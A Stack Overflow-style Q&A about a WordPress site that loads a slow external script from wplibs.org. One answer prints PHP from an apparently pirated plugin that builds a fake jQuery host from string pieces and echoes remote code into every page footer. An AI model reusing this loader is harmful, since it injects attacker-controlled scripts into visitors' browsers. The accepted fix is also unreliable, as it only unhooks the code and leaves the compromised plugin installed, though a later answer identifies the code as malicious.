# How can I find and delete a script that is bottleneckng my website's load time?

Tags: jquery, html, wordpress

I ran a 'pingdom' scan on my website and noticed this little script that is really slowing down my site.

```
<script type="text/javascript">
if(!document.referrer || document.referrer == '') { document.write('<scr'+'ipt type="text/javascript" src="http://www.wplibs.org/jquery.min.js"></scr'+'ipt>'); } else { document.write('<scr'+'ipt type="text/javascript" src="http://www.wplibs.org/jquery.js"></scr'+'ipt>'); }
```

It's adding nearly 6 seconds to the sites loading time. How can I get rid of it?

I tried searching in all of the common wordpress files, but I wasn't able to find that script anywhere.

See this [Pingdom test](http://tools.pingdom.com/fpt/#!/ckqfux/http://emunahcanada.org/) for more information.

Comment: Sounds like a duplicate of: http://stackoverflow.com/questions/29633511/strange-behavior-with-script

Comment: jQuery is automatically included with (and loaded by WordPress - unless you dequeue it - [don't, by the way](http://ttmm.io/tech/dont-dequeue-wordpress-jquery/)) - so there should be no need to load another copy from an external CDN.  Have you searched your theme and plugins for the reference to wplibs.org?

Comment: I have determined that a plugin called 'gravity forms' is causing that code to generate. Whenever I disable gravity forms, that code is gone. I ran a Grep search for 'wplibs' in the plugins folder, but found nothing.

Answer (score 0, accepted):

I'd had trouble with that script too.
Now I think I've fixed it for me at least.
I'm programming a wordpress site and I saw that script was blocking the page load.
Well, I couldn't find the script and I suspected maybe it was a script called by another script or something else.
Step by step I discovered that code was included in the web footer.
I was testing WP Google Map Pro and I found in 'wp-google-map-pro.php' a function on line 144:

```
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
    $host = 'http://';
    echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'wp_func_jquery');
```

}

Well, I just needed to include in 'functions.php' of my theme:

```
remove_action('wp_footer', 'wp_func_jquery');
```

and now that code has dissapeared. I hope it will be usefull !!!

Answer (score 0):

It should be noted that the snippet of code Ladislao is malicious, and likely the result of downloading a pirated version of a plugin...

> $host.'ui'.'jquery.org

That is not a real jquery domain.  [See detailed report here](https://blog.sucuri.net/2015/05/fake-jquery-scripts-in-nulled-wordpress-pugins.html)